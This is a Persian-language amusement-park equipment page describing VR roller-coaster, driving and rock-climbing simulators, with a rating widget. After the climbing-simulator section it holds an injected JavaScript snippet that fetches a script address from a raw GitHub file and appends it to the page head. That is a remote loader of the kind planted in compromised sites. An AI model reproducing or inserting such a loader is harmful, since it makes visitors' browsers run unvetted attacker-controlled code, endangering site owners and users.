شبیه ساز ها

  • یکی از محبوب تریت واسیل شهر بازی شبیه ساز ها و ( عینک های واقعیت مجازی ) است. مشهور ترین این شیح ساز های ترن هوای است. امروزه شیبه سازهای تران مانند هوایی ، رنجر ، ماشین های رالی و … در سراسر ایران و جهان مشاهده کنید بر جرعت می توان گفت این شبیه سازها یکی از الزامی ترین لوازم شر بازی های بروز است.

    شبیه ساز های ترن هوای

    این شبیه ساز ها برای معمولا رنده سنی خاصی ندارد. ترن های هوای پر هیجان ترین و پر استقبال ترین واسیل شهر بازی ها بود اما متاسفانه این وسیله نیاز به جای بزرگ دارد و هر رند سنی نمی توانند از آن استفاده کنند. بنا بر این این دستگاه ها در شهر بازی های که فضای کافی برای ترن هوای را ندارند از این دستگاه استفاده می کنند .

    هر چند ترن هوای هیجان بیشتری دارد ولی برای هر ردسنی مناسب نمی باشد برای همین دلیل این دستگاه ها برای کودکان نیز از این شیح ساز ها استفاده کنند. ولی این شبیه ساز ها تصاویر مصنوعی دارند پس نمی توان که توقع داشته اون هیجان اصلی خود ترن های هوای را به ما منتقل کنند.

    شبیه ساز ماشینی

    این که مساحت کمی را اشغال می‌کند می‌تواند هم در شهربازی‌ها قرار بگیرد و هم در اماکن تفریحی سرپوشیده مانند پاساژها، لابی سینماها، هتل‌ها و … خطر این شبیه ساز نسبت به کارتینگ کمتر است و رد سنی خاصی هم ندارد. ولی هیجان و ادرنالینی که در کاتینگ سواری وجو دارد این شیح ساز ندارد.

    شیبه ساز صخره نوردی

    این شبیه ساز صخره نوردی یک دستگاه که در شهر بازی و باشگاه می توان استفاده کرد. این دستگاه با  قابلیت تنظیم شیب یک شبیه ساز صخره نوردی عالی است. با تنظیم شیب میزان سختی افزایش میابد. درگیری عضلات تمام بدن و هماهنگی عصب و عضله این وسیله را برای تمام سنین مناسب کرده است. 

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید